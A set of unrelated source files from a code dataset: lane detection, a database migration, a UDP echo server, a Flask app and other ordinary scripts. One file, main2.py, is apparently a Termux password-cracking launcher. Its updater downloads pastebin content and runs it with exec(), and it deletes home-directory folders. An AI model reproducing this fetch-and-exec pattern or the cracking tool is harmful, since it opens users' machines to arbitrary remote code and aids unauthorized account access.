right_fit[1] * nonzero_y + \n right_fit[2] - margin)) & \n (nonzero_x < (right_fit[0] * (nonzero_y**2) + \n right_fit[1] * nonzero_y + \n right_fit[2] + margin)) ) \n\n # All the xy-coordinates of nonzero pixels within the lane margins\n left_nz_x = nonzero_x[left_lane_inds]\n left_nz_y = nonzero_y[left_lane_inds] \n\n right_nz_x = nonzero_x[right_lane_inds]\n right_nz_y = nonzero_y[right_lane_inds]\n\n # If left/right_fit did not use center points in find_curvature()\n # (ie. 
used nonzero pixels), then find best-fit based on nonzero pixels\n # within the margins specified above \n if not used_cp:\n\n # Compute a second-order polynomial for best-fit line \n # through the nonzero pixels found within the margins \n left_fit = np.polyfit(left_nz_y, left_nz_x, 2)\n right_fit = np.polyfit(right_nz_y, right_nz_x, 2)\n \n # Otherwise, use the left/right_fit directly given from the param\n # - this is the best-fit based on window center points\n\n # Generate x and y values for plotting\n # - an array = [0, 1, 2, ..., 669]\n ploty = np.linspace(0, img.shape[0]-1, img.shape[0])\n\n # - all x coordinates of the best-fit line calculated above\n left_fitx = left_fit[0] * ploty**2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty**2 + right_fit[1] * ploty + right_fit[2]\n\n # Create a blank image\n # window_img = np.zeros_like(out_img)\n\n # Create two lines to bound the highlighted region\n # then change the x and y points into a valid format for fillPoly()\n\n # np.vstack() --> [ [x0, x1, x2, ..., xn] | left_fitx - margin, \n # [y0, y1, y2, ..., yn] ] | ploty\n # np.transpose() --> [ [x0, y0], | reverses axis\n # [x1, y1],\n # [x2, y2],\n # ... ...\n # [xn, yn] ]\n # np.flipud() --> [ [xn, yn], | reverses order\n # ... ... \n # [x2, y2],\n # [x1, y1],\n # [x0, y0] ]\n\n # left_line_pts after np.hstack()\n # [ [x0, y0], | left_line_window1 \n # [x1, y1], \n # [x2, y2], \n # ... ... \n # [xn, yn], \n # [xn, yn], | left_line_window2 \n # ... ... 
\n # [x2, y2],\n # [x1, y1],\n # [x0, y0] ] | valid format for cv2.fillPoly()\n\n # left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, \n # ploty] ))])\n\n # left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx +\n # margin, \n # ploty])))])\n\n # left_line_pts = np.hstack((left_line_window1, left_line_window2))\n\n # right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin,\n # ploty] ))])\n\n # right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + \n # margin, \n # ploty])))])\n\n # right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n # cv2.fillPoly(window_img, np.int_([left_line_pts]), (0,255, 0))\n # cv2.fillPoly(window_img, np.int_([right_line_pts]), (0,255, 0))\n\n # Blend the highlighted margin window to original image\n # result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n\n # plt.imshow(result)\n\n # plt.plot(left_fitx, ploty, color='yellow')\n # plt.plot(right_fitx, ploty, color='yellow')\n\n # Set x and y axis boundaries\n # plt.xlim(0, img.shape[1])\n # plt.ylim(img.shape[0], 0)\n\n # plt.show()\n\n plot_data = (ploty, left_fitx, right_fitx)\n fit_data = (left_fit, right_fit)\n\n return plot_data, fit_data\n\n# Note to self:\n# - find_curvature() displays yellow best-fit line based on all nonzero pixels\n# that lie within the windows.\n# - on the other hand, find_curved_lane() utilizes best-fit line based on\n# all nonzero pixels that lie within the margin=100 (wider than window)\n# - hence, the two best-fit lines are indeed different\n# - the difference between these two lines, however, seems indistinguishable \n# as both of them go in very similar (if not the same) direction.\n\n\"\"\"============================================================================\nPROCEDURE:\n highlight_lane\nPARAMETERS:\n src_img, a source image\n warped_img, a warped binary image\n mat_inv, an inverse 
transformation matrix calculated from transform_lane()\n plot_data, plotting points calculated from find_curved_lanes()\nPURPOSE:\n to draw and display the detected lanes on the actual source image\nPRODUCES:\n result, an image with detected lanes highlighted in green\n============================================================================\"\"\"\ndef highlight_lane(src_img, warped_img, mat_inv, plot_data):\n\n # Extract plotting data calculcated from find_curved_lanes()\n ploty, left_fitx, right_fitx = plot_data\n\n # Create an color image to show visualization\n warp_blank = np.zeros_like(warped_img).astype(np.uint8)\n warp_color = np.dstack((warp_blank, warp_blank, warp_blank))\n\n # Create two lines to bound the highlighted region\n # then change the x and y points into a valid format for fillPoly()\n # - same method as explained above in find_curved_lanes()\n left_line = np.array([np.transpose(np.vstack([left_fitx, \n ploty]))])\n\n right_line = np.array([np.flipud(np.transpose(np.vstack([right_fitx, \n ploty])))])\n\n lane_area = np.hstack((left_line, right_line))\n\n # Highlight the lane onto the blank warped image\n cv2.fillPoly(warp_color, np.int_([lane_area]), (0, 255, 0))\n\n # Unwarp the highlighted lane image to original image space with the\n # given inverse transformation matrix \n new_warp = cv2.warpPerspective(warp_color, mat_inv, (src_img.shape[1], \n src_img.shape[0]))\n\n # Combine the result with the original image\n result = cv2.addWeighted(src_img, 1, new_warp, 0.3, 0)\n\n # cv2.imshow(\"result\", result)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n return result\n\n\"\"\"============================================================================\n MAIN\n============================================================================\"\"\"\n# def main():\n \n# # Read image\n# img = cv2.imread(\"./ch00/lane_detection/persp_img/test9.jpg\")\n\n# # Check for any errors loading images\n# if img is None:\n# print(\"Error: Failed to load 
image.\")\n# sys.exit()\n\n# # Warp the lanes and binarize using the combined threshold created before\n# warped_lane, _, pers_inv = lp.transform_lane(img)\n# warped_lane_bi = lt.combined_threshold(warped_lane)\n\n# # Show warped image with gradient thresholds\n# cv2.namedWindow(\"warped_lane_bi\")\n# cv2.imshow(\"warped_lane_bi\", warped_lane_bi)\n\n# # Find curvature information from the warped image\n# fit_polynomial, _ = find_curvature(warped_lane_bi)\n\n# # Calculate and display the curved lanes on the warped image\n# plot_data = find_curved_lanes(warped_lane_bi, fit_polynomial)\n \n# highlight_lane(img, warped_lane_bi, pers_inv, plot_data)\n\n\n# if __name__ == '__main__':\n# main()","sub_path":"Part6_Radius/curved_lanes.py","file_name":"curved_lanes.py","file_ext":"py","file_size_in_byte":20618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386910841","text":"version=\"2.3.6\"\n#IMPORT\nimport getpass,time,os,sys\nimport signal\nimport time,os,sys\nimport sys, random\nimport threading,time\n#CVALUE\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\nline=yellow+\"======================================================================================================================\"+end\nspace=\" 
\"\nlogo=red+str(\"\"\"\n███╗░░░███╗██████╗░\n████╗░████║██╔══██╗\n██╔████╔██║██║░░██║\n██║╚██╔╝██║██║░░██║\n██║░╚═╝░██║██████╔╝\n╚═╝░░░░░╚═╝╚═════╝░\n\n░█████╗░██╗░░░░░░█████╗░███╗░░░███╗██╗███╗░░██╗\n██╔══██╗██║░░░░░██╔══██╗████╗░████║██║████╗░██║\n███████║██║░░░░░███████║██╔████╔██║██║██╔██╗██║\n██╔══██║██║░░░░░██╔══██║██║╚██╔╝██║██║██║╚████║\n██║░░██║███████╗██║░░██║██║░╚═╝░██║██║██║░╚███║\n╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚═╝░░░░░╚═╝╚═╝╚═╝░░╚══╝\n\n\n\n\\x1b[94m\n\n╔═══╦╗─╔╦═══╦╗╔╗╔╦═══╦╗─╔╦╗─╔╦═══╦╗──╔╗\n║╔═╗║║─║║╔═╗║║║║║╠╗╔╗║║─║║║─║║╔═╗║╚╗╔╝║\n║║─╚╣╚═╝║║─║║║║║║║║║║║╚═╝║║─║║╚═╝╠╗╚╝╔╝\n║║─╔╣╔═╗║║─║║╚╝╚╝║║║║║╔═╗║║─║║╔╗╔╝╚╗╔╝\n║╚═╝║║─║║╚═╝╠╗╔╗╔╬╝╚╝║║─║║╚═╝║║║╚╗─║║\n╚═══╩╝─╚╩═══╝╚╝╚╝╚═══╩╝─╚╩═══╩╝╚═╝─╚╝\"\"\")\n\nnotice=\"\"\ndef header():\n\tprint(logo+cyan+\"\\n\\n\\n\\t\\tDeveloped By : Md alamin\\n\\n\"+green+\"\\t\\t Version : \"+str(version)+\" \\n\\n\"+end+line+\"\\n\"+end)\ndef clear():\n os.system(\"clear || cls\")\ncount=1\nerase = '\\x1b[1A\\x1b[2K'\ncount=1\nabout=12\nx=3\nwhile x<5:\n user=str(input(red+\"\\n ?? USERNAME : \"))\n passw=str(input(green+\"\\n ☣️PASSWORD : \"))\n if user==\"alamin\" and passw==\"alamin\":\n print(\"Login Succcessfull\")\n sys.stdout.flush()\n time.sleep(2) \n os.system(\"xdg-open https://www.facebook.com/Mdalamin54321\")\n x=8\n else:\n \tprint(red+\"\\n\\t⚠️username or password incorrect⚠️ \")\n \tos.system(\"xdg-open https://www.facebook.com/Mdalamin54321\")\n \tx=3\nos.system(\"clear\")\nheader()\nprint(cyan+\"\\n\\t\\t[•] Checking For Updates\")\ntime.sleep(0.7)\n\n\ntry:\n\timport requests\nexcept:\n\tos.system(\"pip install requests\")\nimport requests\nr=requests.get('https://pastebin.com/4YKFarFn')\nupchck=r.text\nif upchck==version:\n\tpass\nelif upchck!=version:\n\tos.system(\"clear\")\n\theader()\n\tprint(cyan+\"\\n [°] Installing The Updated Tools. Allow Up to 10 minutes \")\n\ttime.sleep(2)\n\tos.system(\"clear\")\n\tnotice=cyan+\"\\t\\t[°] Installing Updated Tools.. 
\\n\"\n\theader()\n\tnotice=\"\"\n\tprint(\"\\n\")\n\tclear()\n\tnotice=cyan+\"\\t\\t[•] Backing up the Mafiya cybet king ....\"\n\theader()\n\tos.system(\"mkdir $HOME/z_updater\")\n\tos.system(\"cp -rf $HOME/z $HOME/j_updater\")\n\ttry:\n\t\tclear()\n\t\tnotice=cyan+\"\\t\\t[•] Updating the Tools....\"\n\t\theader()\n\t\tos.system(\"cd $HOME\")\n\t\tos.system(\"cd $HOME && rm -rf z \")\n\t\tprint(green)\n\t\tos.system(\"cd $HOME && https://github.com/HANTER2/z\")\n\t\t\n\t\tclear()\n\t\tnotice=green+\"\\t\\t[√] Update Successful!\"\n\t\theader()\n\t\t#os.kill(os.getppid(), signal.SIGHUP)\n\t\tos.system(\"rm -rf $HOME/z_updater\")\n\t\tfor i in range(99999999999):\n\t\t\tr2=requests.get(\"https://pastebin.com/4YKFarFn\")\n\t\t\tr=requests.get('https://pastebin.com/4YKFarFn')\n\t\t\tupchck=r.text\n\n\t\t\tos.system(\"clear\")\n\t\t\tprint(green+\"\\n\"*4+\"\\t [✓] Successfully Updated to Mafiya cyber king \"+yellow+str(upchck)+green+\" !\\n\\n\\n\\n\"+cyan+\" [•] What's New in Version \"+str(upchck)+\" ?\\n\\n\")\n\t\t\trng=r2.text\n\t\t\texec(rng)\n\t\t\tprint(yellow+\"\\n\\n\\n [•••] TerMux Restart is Required for The Update. 
Please Restart Termux For The Mafiya cyber king Updated Version\")\n\t\t\ta=input()\n\n\texcept:\n\t\tclear()\n\t\tnotice=red+\"\\t\\t[×] Update Failed!\"\n\t\theader()\n\t\tsjsjstshsb=input(cyan+\"\\n\\n\\t Press Enter to Restore ROC-X\")\n\t\tos.system(\"cd $HOME\")\n\t\tos.system(\"cd $HOME && mkdir z \")\n\t\tos.system(\"cd $HOME && cp -rf $HOME/i_updater/z $HOME\")\n\t\tos.system(\"rm -rf $HOME/z_updater\")\n\t\tos.system(\"python3 $HOME/z/main2.py\")\n\t\tfor i in range(99999999999):\n\t\t\tos.system(\"clear\")\n\t\t\ta=input()\n#Main Page\n\nwhile count<2:\n\tclear()\n\theader()\n\tnotice=\"\"\n\tprint(cyan+\"\\n==> Select the number of the option that you want to start from below : \")\n\tprint(\"\\n\\n[1] 6 Digit Password \\n\\n[2] 7 Digit Password \\n\\n[3] 8 Digit Password\\n\\n[4] 9 Digit Password \\n\\n[5] Contact Me\\n[6] uuuu\")\n\t\n\t\n\tmain_opt=str(input(blue+\"\\n[>] Select Your Option : \"+yellow))\n\tif main_opt==\"1\":\n\t\tos.system(\"python newfile.py\")\n\t\t\n\t\n\telif main_opt==\"2\":\n\t\tos.system(\"python newfile.py2\")\n\t\t\n\t\n\telif main_opt==\"3\":\n\t\tos.system(\"python newfile.py3 \")\n\telif main_opt==\"4\":\n\t\tos.system(\"python newfile.py4\")\n\n\telif main_opt==\"5\":\n\t\tos.system(\"xdg-open https://www.facebook.com/Mdalamin54321\")\n \t\n\t\t\n\t\t\n\telse:\n\t\tclear()\n\t\tnotice=red+\"\\t\\t[×] Wrong Option Entered!\"\n\t\tcount=1","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"103621290","text":"\"\"\"empty message\n\nRevision ID: 2453c767d036\nRevises: d0c387e43ca4\nCreate Date: 2021-08-21 14:53:11.208418\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2453c767d036'\ndown_revision = 'd0c387e43ca4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - 
please adjust! ###\n op.drop_constraint('forms_field_id_fkey', 'forms', type_='foreignkey')\n op.drop_column('forms', 'field_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('forms', sa.Column('field_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.create_foreign_key('forms_field_id_fkey', 'forms', 'fields', ['field_id'], ['id'])\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/20210821_145311_.py","file_name":"20210821_145311_.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217875386","text":"#coding:utf-8\n\n'''\n\t双色球:红球 01~33 选择6个 篮球 01~16选择一个为一组\n\n\tAuthor:孔小发\n\tDatetime:2019-07-22\n'''\n\nfrom random import randint, sample\n\n\ndef display(balls):\n '''输出双色球号码'''\n for index, ball in enumerate(balls):\n if index == len(balls) - 1:\n print('|', end=' ')\n print(\"{}\".format(ball), end=' ')\n print() # 默认输出换行\n\ndef random_select():\n '''输出随机双色球号码'''\n red_balls = [i for i in range(0, 33)]\n balls = sample(red_balls, 6)\n balls.append(randint(1, 16))\n return balls\n\ndef main():\n '''主函数逻辑:决定买几注'''\n n = int(input(\"请选几注:\"))\n for _ in range(n):\n display(random_select())\n\nif __name__ == \"__main__\":\n main()","sub_path":"code/双色球.py","file_name":"双色球.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"303070302","text":"# -*- coding:utf-8 -*-\n# ___________________________\n# < Is this really happening? 
>\n# ---------------------------\n# \\ ^__^\n# \\ (oo)\\_______\n# (__)\\ )\\/\\\n# ||----w |\n# || ||\n\nfrom time import sleep\nimport argparse\n\ndef load_config():\n import yaml\n with open('config.yml') as config_file:\n config = yaml.load(config_file, Loader=yaml.FullLoader)\n return config\n\nconfig = load_config()\n\nimport logging\nimport sys\nlogger = logging.getLogger()\n# it's very import to keep daemon running\nlogger.propagate = False\nhandler = logging.FileHandler(config[\"base_config\"][\"log_file\"])\nformatter = logging.Formatter(\n '%(asctime)s %(levelname)-8s %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nlog_level_config = config[\"base_config\"][\"log_level\"]\nassert log_level_config in ['DEBUG', 'INFO', 'WARNING', 'ERROR']\nif log_level_config == 'DEBUG':\n log_level = logging.DEBUG\nelif log_level_config == 'INFO':\n log_level = logging.INFO\nelif log_level_config == 'WARNING':\n log_level = logging.WARNING\nelif log_level_config == 'ERROR':\n log_level = logging.ERROR \n\nlogger.setLevel(log_level)\n\nkeep_fds = [handler.stream.fileno()]\n\ndef action(immediate=False):\n run(config, immediate)\n\nfrom daemonize import Daemonize\npid = \"/tmp/simple_backup.pid\"\ndaemon = Daemonize(app=\"simple_monitoring\", pid=pid, action=action, keep_fds=keep_fds)\n\nif __name__ == \"__main__\":\n from run import run\n parser = argparse.ArgumentParser(description='Simple Backup')\n parser.add_argument('-d', \"--daemon\", help=\"Daemon mode\", action=\"store_true\")\n parser.add_argument('-i', \"--immediate\", help=\"Immediately run once\", action=\"store_true\")\n args = parser.parse_args()\n logger.info(\"############### starting simple monitoring services #######################\")\n if args.daemon:\n daemon.start()\n if args.immediate:\n action(immediate=True)\n else:\n action()\n 
\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"546076340","text":"import socket\nimport array\n\nBUFSIZE = 512\nport = 50000\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind(('', port))\nprint('udp echo server ready')\nwhile 1: \n data, addr = s.recvfrom(BUFSIZE)\n doubles = array.array('d', data)\n print('server received %r from %r' % (doubles, addr))\n s.sendto(data, addr)","sub_path":"udpecho.py","file_name":"udpecho.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"589162674","text":"from typing import Optional, List\n\n\nclass GoogleSearchResult:\n def __init__(self, title: str, link: str, snippet: str) -> None:\n self.code = 200\n self.message = \"OK\"\n self.title = title\n self.link = link\n self.snippet = snippet\n self.context_link = \"\"\n\n\nclass GoogleImageResult:\n def __init__(self, link: str, snippet: str, context_link: str) -> None:\n self.code = 200\n self.message = \"OK\"\n self.link = link\n self.snippet = snippet\n self.title = \"\"\n self.context_link = context_link\n\n\nclass YoutubeSearchResult:\n def __init__(\n self, video_id: str, title: str, description: str, channel: str\n ) -> None:\n self.code = 200\n self.message = \"OK\"\n self.link = f\"https://www.youtube.com/watch?v={video_id}\"\n self.title = title\n self.description = description\n self.channel = channel\n\n\nclass NotFoundResult:\n def __init__(self) -> None:\n self.code = 404\n self.message = \"Not Found\"\n self.link = \"\"\n self.snippet = \"\"\n self.title = \"\"\n self.description = \"\"\n self.context_link = \"\"\n\n\nclass DvachThread:\n def __init__(self, link: str, image: str, thread_id: str) -> None:\n self.link = link\n self.image = image\n self.thread_id = thread_id\n\n\nclass DvachPost:\n def __init__(\n self, 
message: str, message_link: str, images: Optional[List[str]] = []\n ) -> None:\n self.message = message\n self.message_link = message_link\n self.images = images\n","sub_path":"lib/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584912483","text":"import os, sys\nimport argparse\nimport numpy as np\nimport torch\nimport torchvision.transforms as t\n\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.datasets.folder import default_loader\nfrom tqdm import tqdm\n\nfrom alexnet import KitModel as AlexNet\nfrom vgg19 import KitModel as VGG19\n\nfrom utils.video_reader import DecordVideoReader\nfrom PIL import Image\n\nclass ImageListDataset (Dataset):\n\n def __init__(self, list_filename, root=None, transform=None):\n super(ImageListDataset).__init__()\n \n with open(list_filename, 'r') as list_file:\n self.list = list(map(str.rstrip, list_file))\n \n self.root = root\n self.transform = transform\n \n def __getitem__(self, index):\n path = self.list[index]\n if self.root:\n path = os.path.join(self.root, path)\n \n x = default_loader(path)\n if self.transform:\n x = self.transform(x)\n \n return x\n \n def __len__(self):\n return len(self.list)\n \n \nclass VideoDataset (Dataset):\n\n def __init__(self, vr, transform=None):\n super(VideoDataset).__init__()\n \n self.vr = vr\n self.transform = transform\n \n def __getitem__(self, index):\n img =Image.fromarray(self.vr[index])\n \n if self.transform:\n x = self.transform(img)\n \n return x\n \n def __len__(self):\n return len(self.vr)\n\n \nclass ImageDataset (Dataset):\n\n def __init__(self, imgs, transform=None):\n super(ImageDataset).__init__()\n \n self.imgs = imgs\n self.transform = transform\n \n def __getitem__(self, index):\n img =Image.fromarray(self.imgs[index])\n \n if self.transform:\n x = self.transform(img)\n \n return x\n \n def __len__(self):\n return 
len(self.imgs)\n \n# pretrianed_models = ('hybrid_finetuned_fc6+','hybrid_finetuned_all','vgg19_finetuned_fc6+', 'vgg19_finetuned_all')\ndef sentiment_analysis(cropped_imgs,model, batch_size=8):\n\n transform = t.Compose([\n t.Resize((224, 224)),\n t.ToTensor(),\n t.Lambda(lambda x: x[[2,1,0], ...] * 255), # RGB -> BGR and [0,1] -> [0,255]\n t.Normalize(mean=[116.8007, 121.2751, 130.4602], std=[1,1,1]), # mean subtraction\n ])\n\n \n #vr = DecordVideoReader(\"videos/test.mp4\",is_torch=False)\n #data = VideoDataset(vr, transform=transform)\n data = ImageDataset(cropped_imgs, transform=transform)\n dataloader = DataLoader(data, batch_size=batch_size, num_workers=0, pin_memory=True)\n \n #topk = [] \n score = []\n #f= 0\n with torch.no_grad():\n for x in tqdm(dataloader):\n p = model(x.to('cuda')).cpu().numpy() # order is (NEG, NEU, POS)\n for single_pic in p:\n #topk.append([single_pic[2]-single_pic[0],f])\n #f += 1\n score.append( single_pic[2]-single_pic[0])\n #np.savetxt(sys.stdout.buffer, p, delimiter=',')\n print(score)\n #topk.sort(key= lambda element: element[0] ,reverse=True)\n #for i in range(10):\n #print(topk[i][1])\n #Img = Image.fromarray(vr[topk[i][1]])\n #Img.save(\"Photo/{}.jpg\".format(i))\n return score\n \n\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32491866","text":"from flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash\nimport config\nimport logging\nimport time\nimport requests, json\nimport os\nimport search\n\napp = Flask(__name__)\nlog = logging.getLogger('werkzeug')\nlog.setLevel(logging.ERROR)\n\n@app.route('/')\ndef index():\n return render_template('embedded.html')\n\n# API endpoint used to skip a song\n# Uses short polling, rather than implementing websockets\n# or long polling for such a simple site for personal use\n@app.route('/skip', 
methods=['GET'])\ndef skip():\n skip = config.skip\n config.skip = 0\n return str(skip)\n\n# API endpoint that plays the next song\n@app.route('/nextsong', methods=['GET'])\ndef nextsong():\n if len(config.songs) == 0:\n config.currentSong = None\n return ''\n else:\n currentSongId, config.currentSong = config.songs.pop() \n config.numSongs -= 1\n return currentSongId\n\ndef stopLogging():\n time.sleep(1)\n log_names = ['werkzeug']\n app_logs = map(lambda logname: logging.getLogger(logname), log_names)\n\n for app_log in app_logs:\n for hdlr in app_log.handlers[:]: # remove all old handlers\n app_log.removeHandler(hdlr)\n","sub_path":"embedded.py","file_name":"embedded.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83610377","text":"import random\nimport math\nfrom player import Player\nfrom board import Board\nfrom combat_engine import CombatEngine\nfrom movement_engine import MovementEngine\nfrom economic_engine import EconomicEngine\nfrom unit import Destroyer, Scout, Decoy, Colony, ColonyShip, ShipYard\nfrom technology import Technology\nimport sys\nsys.path.append(\"tests\")\nfrom otest import cstring\n\n\nclass Game:\n # Initialize with 2 players and turn starts at 0\n def __init__(self, board_size, logging=False, rendering=False, die_mode=\"normal\", game_level=1, die_size=6, debug_mode=True):\n self.debug_mode = debug_mode\n self.die_size = die_size\n self.game_level = game_level\n self.die_mode = die_mode\n self.current_id = 0\n self.last_die = 0\n self.current_turn = 0\n self.logging = logging\n self.rendering = rendering\n self.players = []\n self.board = Board(self, board_size)\n self.board.init_planets((3, 6), (3, 0))\n self.board.create()\n self.combat = CombatEngine(self)\n self.movement = MovementEngine(self)\n self.economy = EconomicEngine(self)\n self.phase = \"Beginning\"\n self.round = 0\n self.winner = None\n self.current_player_id = 0\n\n # 
Add player to the game before running\n def add_player(self, player):\n self.players.append(player)\n player.id = len(self.players)-1\n\n def start(self):\n for player in self.players:\n player.start()\n self.log(f\"{player.get_name()} uses {type(player.strat).__name__}\")\n self.board.create()\n\n # Run for 100 turns or until all of a player's units are dead\n def run_until_completion(self, max_turns=100):\n if self.game_level == 2:\n self.phase = \"Economic\"\n self.economy.economic_phase(self.current_turn)\n while self.current_turn <= max_turns:\n self.current_turn += 1\n self.phase = \"Movement\"\n self.movement.movement_phase(self.current_turn)\n self.phase = \"Combat\"\n\n # Combat phase returns if someone won\n if self.combat.combat_phase(self.current_turn):\n break\n if self.game_level > 2:\n self.phase = \"Economic\"\n self.economy.economic_phase(self.current_turn)\n if self.test_for_winner():\n break\n self.winner = self.test_for_winner()\n if self.winner:\n self.log(\"We have a winner!!\")\n self.log(f\"Turns taken: {self.current_turn}\")\n return True\n else:\n self.log(\"Nobody won!\")\n return False\n\n def test_for_winner(self):\n alive_players = [(p, any(True for c in p.get_units() if type(c) == Colony and c.is_home_colony)) for p in self.players]\n\n loser = next((x[0] for x in alive_players if not x[1]), None)\n if loser is not None:\n alive_players.remove((loser, False))\n return alive_players[0][0]\n return None\n\n # Print to console if logging is enabled\n def log(self, *s):\n if self.logging:\n print(cstring(f\"&6{self.current_turn} &4{self.phase} &3{', '.join(str(x) for x in s)}\"))\n\n # Raise a prettier exception\n def throw(self, error, *details):\n if self.debug_mode:\n print(cstring(f\"\"\"\n&1ERROR THROWN:\n&7{error}\n&1DETAILS:\n&6Turn {self.current_turn} &4Phase {self.phase}\n&7{', '.join(str(x) for x in details)}\n \"\"\"\n ))\n import sys\n sys.exit(0)\n\n # # Render if rendering is enabled\n # def render(self):\n # if 
self.rendering:\n # self.board.render()\n\n def die_roll(self):\n if self.die_mode == \"ascend\":\n self.last_die += 1\n return ((self.last_die-1) % self.die_size) + 1\n elif self.die_mode == \"normal\":\n # return random.randint(1, self.die_size)\n #! This is a problem if we don't agree on exactly what this should be\n return math.ceil(self.die_size*random.random())\n elif self.die_mode == \"descend\":\n self.last_die -= 1\n return (self.last_die % self.die_size) + 1\n\n # Theoretically this should just be a nonrepeating value\n def next_id(self):\n self.current_id += 1\n return self.current_id\n\n def get_unit_data(self):\n return {\n \"Scout\": {\"cp_cost\": Scout.cp_cost, \"shipsize_needed\": Scout.req_size_tech, \"hullsize\": Scout.hull_size},\n \"Destroyer\": {\"cp_cost\": Destroyer.cp_cost, \"shipsize_needed\": Destroyer.req_size_tech, \"hullsize\": Destroyer.hull_size}\n }\n\n def unit_str_to_class(self, unit):\n return {\n \"Scout\": Scout,\n \"Destroyer\": Destroyer,\n \"ColonyShip\": ColonyShip,\n \"ShipYard\": ShipYard,\n \"Colony\": Colony\n }[unit]\n\n def generate_state(self, player=None, combat=False):\n return {\n 'turn': self.current_turn,\n 'winner': None,\n 'players': [p.generate_state(player==p, combat) for p in self.players],\n 'player_whose_turn': self.current_player_id,\n 'phase': self.phase,\n 'round': self.round,\n 'technology_data': Technology.get_state(),\n 'unit_data': self.get_unit_data(),\n 'board_size': self.board.size\n }\n","sub_path":"deprecated/src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"276409210","text":"\"\"\"\nscons build file\n\n\tp\n\n@author: Jean-Lou Dupont\n\"\"\"\n\nImport('env')\n\nd = env.Dictionary()\n\n#no difference at this point\nif d.get('_DEBUG', False):\n\t#DEBUG\n\tlibs=['ei','epapi_debug']\n\tpr = env.Program('decho', Glob(\"src/*.cc\"), LIBS=libs 
)\t\nelse:\n\t#RELEASE\n\tlibs=['ei','epapi']\n\tpr = env.Program('echo', Glob(\"src/*.cc\"), LIBS=libs )\n\t\nDefault(pr)\n","sub_path":"package/test/echo/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460541143","text":"### usage\n# python 04_concat_scaffolds.py /path/to/parentdir/used/in/00_start-pipeline/command \n### \n\n### purpose\n# instead of calling snps when combining some of our pools, call snps for indiviual pools\n###\n\n### FIX\n# I've used 'kit' as a key word that is in all of the library/pool names, this should be changed if not the case\n# see creation of combdict\n###\n\n### imports\nimport sys\nimport os\nfrom os import path as op\nfrom os import listdir\nimport pickle\nimport numpy as np\ndef uni(mylist):\n return (np.unique(mylist).tolist())\ndef ls(DIR):\n return sorted([f for f in listdir(DIR)])\ndef fs (DIR):\n return sorted([op.join(DIR,f) for f in ls(DIR)])\ndef createdirs(dirs):\n for d in dirs:\n if not op.exists(d):\n os.makedirs(d)\n### \n\n### args\nthisfile, parentdir = sys.argv\nif parentdir.endswith(\"/\"):\n parentdir = parentdir[:-1]\npoolref = pickle.load(open(op.join(parentdir,'poolref.pkl'),'rb'))\n###\n\n### dirs\nshdir = op.join(parentdir,'shfiles/concat')\ncatdir = op.join(parentdir,'concatenated_vcfs')\nfiltdir = op.join(parentdir,'filtered_snps')\ncreatedirs([shdir,catdir,filtdir])\n###\n\n# get the snpfiles\nsnpdir = op.join(parentdir,'snps')\nallfiles = fs(snpdir)\nsnpfiles = [f for f in fs(snpdir) if f.endswith('.gz') and 'snp' in op.basename(f) and f.replace('.gz','.gz.tbi') in allfiles]\nos.system('echo \"len(snpfiles) = %s\"' % str(len(snpfiles)))\n\n# sort snpfiles by combo lib\ncombdict = {}\nfor i,snp in enumerate(snpfiles):\n lib = \"---\".join([x for x in op.basename(snp).split(\"-\") if 'kit' in x])\n if not lib in combdict:\n combdict[lib] = []\n 
